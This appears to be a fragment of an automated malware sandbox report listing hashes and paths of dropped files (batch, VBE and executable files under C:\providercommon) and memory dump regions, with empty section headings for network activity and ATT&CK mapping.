cdb37ed9a16e90304ef41666c0a284ff

SHA1
64550f45dee811a50cf97739f228738c3dda215a

SHA256
6804963af1250ee25aa9d00b96cfb51e3380ecc90f4f2693fc21f0bda68df481

SHA512
41fb02216dd69209059cc5a8f0d631c357d7d1c7515e6f637c1b70c37a1c9c64124cd345fbee6918ac0d4f801a9b26c1518e20e13d6febb09aebb232d1092622

Download Submit
C:\Users\Admin\AppData\Local\Temp\y17QM3q8Rw.bat

Filesize
199B

MD5
9a7d3b7cd56919fc3e97de50279fca79

SHA1
b456ba8a39b0348cd2f3a81238162aab631f71e5

SHA256
a6a3be1306d79b6c51bd77235f9185db850c4e796d62d22b0c42a02b284d65ac

SHA512
78f732cf2393c269aa91ddb06f7f1c981f2b060f5f245442c4a950ad47e035edf6ec01a4287d19f8579a90dcce5777d1c4910d55d45caa8110c62d0af7005626

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/1380-259-0x00000000015C0000-0x00000000015D2000-memory.dmp

Filesize
72KB

Download
memory/1380-265-0x000000001C6C0000-0x000000001C869000-memory.dmp

Filesize
1.7MB

Download
memory/2248-292-0x000000001C140000-0x000000001C2E9000-memory.dmp

Filesize
1.7MB

Download
memory/2512-307-0x0000000002AC0000-0x0000000002AD2000-memory.dmp

Filesize
72KB

Download
memory/2548-241-0x000000001CA10000-0x000000001CAB1000-memory.dmp

Filesize
644KB

Download
memory/2548-235-0x00000000017B0000-0x00000000017C2000-memory.dmp

Filesize
72KB

Download
memory/3288-271-0x000000001BE10000-0x000000001BFB9000-memory.dmp

Filesize
1.7MB

Download
memory/3456-257-0x000000001BF50000-0x000000001BFF1000-memory.dmp

Filesize
644KB

Download
memory/3472-17-0x000000001B5E0000-0x000000001B5EC000-memory.dmp

Filesize
48KB

Download
memory/3472-12-0x00007FFD9C1F3000-0x00007FFD9C1F5000-memory.dmp

Filesize
8KB

Download
memory/3472-13-0x00000000007A0000-0x00000000008B0000-memory.dmp

Filesize
1.1MB

Download
memory/3472-14-0x000000001B5B0000-0x000000001B5C2000-memory.dmp

Filesize
72KB

Download
memory/3472-15-0x000000001B5D0000-0x000000001B5DC000-memory.dmp

Filesize
48KB

Download
memory/3472-16-0x000000001B5C0000-0x000000001B5CC000-memory.dmp

Filesize
48KB

Download
memory/3604-64-0x0000018D78C20000-0x0000018D78C42000-memory.dmp

Filesize
136KB

Download
memory/3612-333-0x0000000001300000-0x0000000001312000-memory.dmp

Filesize
72KB

Download
memory/3900-326-0x0000000002C90000-0x0000000002CA2000-memory.dmp

Filesize
72KB

Download
memory/3904-278-0x000000001C6B0000-0x000000001C859000-memory.dmp

Filesize
1.7MB

Download
memory/3972-249-0x000000001BE20000-0x000000001BEC1000-memory.dmp

Filesize
644KB

Download
memory/4972-285-0x000000001C220000-0x000000001C3C9000-memory.dmp

Filesize
1.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.